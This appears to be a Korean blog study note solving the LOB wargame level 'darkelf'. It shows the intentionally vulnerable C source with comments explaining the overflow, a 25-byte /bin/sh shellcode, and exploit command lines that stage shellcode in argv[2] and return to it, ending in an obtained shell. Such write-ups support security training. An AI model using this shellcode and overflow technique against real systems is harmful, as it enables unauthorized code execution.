[lob] wolfman -> darkelf공부/LOB 2014. 7. 30. 20:03
[wolfman@localhost wolfman]$ cat darkelf.c
/*
The Lord of the BOF : The Fellowship of the BOF
- darkelf
- egghunter + buffer hunter + check length of argv[1]
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
/*
 * Intentionally vulnerable challenge program (LOB "darkelf" level): copies
 * argv[1] into a fixed 40-byte stack buffer after a set of weak checks.
 * Note for readers: main is declared with no return type (implicit int) and
 * memset/strlen/strcpy are used without <string.h>, so a modern compiler
 * warns about or rejects this file as written.
 */
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// egghunter
// Zeroes the contents of every environment string; the name suggests this is
// meant to defeat payloads staged in the environment.
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
// Reads byte 47 of argv[1] before the length check below, so an argument
// shorter than 48 bytes turns this into an out-of-bounds read of argv[1].
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// check the length of argument
// Permits up to 48 bytes while buffer holds only 40, so the strcpy below can
// write 8 bytes past the end of buffer. A check against sizeof buffer - 1, or
// a bounded copy such as snprintf(buffer, sizeof buffer, "%s", argv[1]),
// would close the overflow.
if(strlen(argv[1]) > 48){
printf("argument is too long!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
// Clears only the 40 bytes of buffer itself before returning; any bytes that
// strcpy wrote beyond buffer are not undone here.
memset(buffer, 0, 40);
}
[wolfman@localhost wolfman]$
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80
25 byte shellcode
ltrace ./elf `python -c'print "a"*19"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x19\xfa\xff\xbf"'
ltrace ./elf `python -c'print "\x90"*19+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x19\xfa\xff\xbf"'`
[wolfman@localhost wolfman]$ ./elf `python -c'print "a"*44+"\x45\xfc\xff\xbf"'` `python -c'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
//argv[2] 에 쉘코드를 올리고 그 주소로 점프
ltrace ./dark `python -c'print "a"*44+"\x0d\xfc\xff\xbf"'` `python -c'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
[wolfman@localhost wolfman]$ ./darkelf `python -c'print "a"*44+"\x0f\xfc\xff\xbf"'` `python -c'print "\x90"*30+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa?
bash$ my-pass
euid = 506
kernel crashed
bash$